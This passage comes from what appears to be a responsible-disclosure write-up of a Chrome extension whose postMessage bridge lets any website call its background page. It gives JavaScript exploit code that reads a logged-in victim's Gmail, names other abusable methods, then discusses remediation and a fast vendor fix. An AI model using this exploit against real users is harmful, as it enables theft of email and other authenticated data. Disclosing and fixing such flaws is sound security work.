            "method": "thGetVoices",
            "payload": {
                "refresh": "true",
                "url": input_url
            }
        }, "*");
    });
}
setTimeout(function() {
    exploit_get("https://mail.google.com/mail/u/0/h/").then(function(response_body) {
        alert("Gmail emails have been stolen!");
        alert(response_body);
    });
}, 1000);

The above exploit code shows that cross-origin responses can be read via this vulnerability. In this case the endpoint for Gmail’s “Simple HTML” version is provided. The above payload can be hosted on any website and it will be able to read the emails of someone who is logged in to Gmail. This is done by issuing a message via postMessage with the appropriate payload set and adding an event listener for the response message. By chaining JavaScript Promises returned via the “exploit_get()” function we can steal data from any site that the user is authenticated to (assuming it can be accessed via HTTP GET without any special headers).

While the above example references the “thGetVoices” background method call, this is merely one of the vulnerabilities which occurs from calling these background page APIs. In addition to using this call, some other examples of vulnerabilities which can be exploited are the following:

  • “thExtBGAjaxRequest”, which an attacker can use to perform an arbitrary POST request of type “application/x-www-form-urlencoded;charset=UTF-8” with attacker-controlled parameters and read the response body.
  • “OpenTab”, which allows an attacker to open an endless number of tabs to arbitrary locations normally restricted for web pages.

Proof-of-Concept Video

Root Cause & Remediation Thoughts

This vulnerability demonstrates a common security pitfall in extensions. To be more flexible with Chrome extension API usage, many extensions build a bridge that allows calling the background page from the regular web context. Many Chrome extension developers forget to validate the origin of these messages to prevent arbitrary sites from calling potentially sensitive functionality. In this case, the ideal remediation would likely be to move most of the logic into the Content Script and trigger it not via postMessage but via event listeners that validate the isTrusted property. This way it can be ensured that all calls are triggered by genuine user actions instead of being forged by an attacker.
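As a sketch of the origin-checking half of this remediation (hypothetical helper and allowlist, not the vendor’s actual patch), the bridge could refuse any message that does not come from an expected origin:

```javascript
// Hypothetical guard for the postMessage bridge: accept a bridge message
// only if it carries the expected type AND comes from an allowlisted origin.
// The allowlist below is an assumption for illustration.
var ALLOWED_ORIGINS = ["https://docs.google.com"];

function isAllowedMessage(event) {
    return ALLOWED_ORIGINS.indexOf(event.origin) !== -1 &&
        !!event.data &&
        event.data.type === "1757FROM_PAGERW4G";
}
```

Note that the vulnerable handler only compares “event.source == window”, a check which any script running in the page trivially passes since the Content Script and the page share the same window; checking “event.origin” against a fixed allowlist (or moving the functionality behind isTrusted DOM events) removes the arbitrary-website attack surface.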

Timeline

  • June 3rd (Late Friday night): Reported vulnerability.
  • June 3rd: Vendor confirmed receipt of the issue and said they would take a look on Monday.
  • June 4th (Monday): Patch released for the vulnerability. I was actually incorrect about the timeline: the development team is based in Ireland (so they received the report on Saturday) and had fixed the issue by Sunday. The patch was only released early Monday morning (6:00am EST) due to a strict QA process to make sure everything was up to snuff before releasing. There was no delay between receiving the issue and working on a fix :). So the vendor response is actually even more impressive than previously stated.